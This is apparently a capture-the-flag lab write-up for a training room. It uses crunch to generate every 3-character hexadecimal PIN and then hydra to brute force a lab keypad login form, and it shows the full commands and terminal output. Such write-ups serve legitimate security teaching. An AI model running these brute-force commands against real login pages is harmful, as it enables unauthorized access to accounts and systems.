Day 3
This room is a very simple introduction to the tool Hydra which helps in brute forcing.
Learning Objectives
Password complexity and the number of possible combinations
How the number of possible combinations affects the feasibility of brute force attacks
Generating password combinations using
crunch
Trying out passwords automatically using
hydra
The room is very straightforward with all the commands given to us already we just need to run them.
After starting the maching and going to the site. We find a keypad like interface

Upon entering a random code we can see it is only a 3 digit pin, should be very quick to brute force.
The numeric keypad shows 16 characters, 0 to 9 and A to F, i.e., the hexadecimal digits. We need to prepare a list of all the PIN codes that match this criteria. We will use Crunch, a tool that generates a list of all possible password combinations based on given criteria. We need to issue the following command:
crunch 3 3 0123456789ABCDEF -o 3digits.txt
The command above specifies the following:
3
the first number is the minimum length of the generated password3
the second number is the maximum length of the generated password0123456789ABCDEF
is the character set to use to generate the passwords-o 3digits.txt
saves the output to the3digits.txt
file
┌──(kali㉿kali)-[~/THM/AOC2023/Day3]
└─$ crunch 3 3 0123456789ABCDEF -o 3digits.txt
Crunch will now generate the following amount of data: 16384 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 4096
crunch: 100% completed generating output
the main login page http://10.10.125.46:8000/pin.php receives the input from the user and sends it to /login.php
using the name pin
.
These three pieces of information, post
, /login.php
, and pin
, are necessary to set the arguments for Hydra.
We will use hydra
to test every possible password that can be put into the system. The command to brute force the above form is:
hydra -l '' -P 3digits.txt -f -v 10.10.125.46 http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000
The command above will try one password after another in the 3digits.txt
file.
┌──(kali㉿kali)-[~/THM/AOC2023/Day3]
└─$ hydra -l '' -P 3digits.txt -f -v 10.10.125.46 http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-04 00:54:33
[DATA] max 16 tasks per 1 server, overall 16 tasks, 4096 login tries (l:1/p:4096), ~256 tries per task
[DATA] attacking http-post-form://10.10.125.46:8000/login.php:pin=^PASS^:Access denied
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
.
.
.
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/control.php
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
[8000][http-post-form] host: 10.10.125.46 password: [REDACTED]
[STATUS] attack finished for 10.10.125.46 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-04 00:56:52
We get the PIN for the keypad. Now we just enter it in the Keypad.

Now we just need to click on Unlock Door and it will give us our flag.

Last updated
Was this helpful?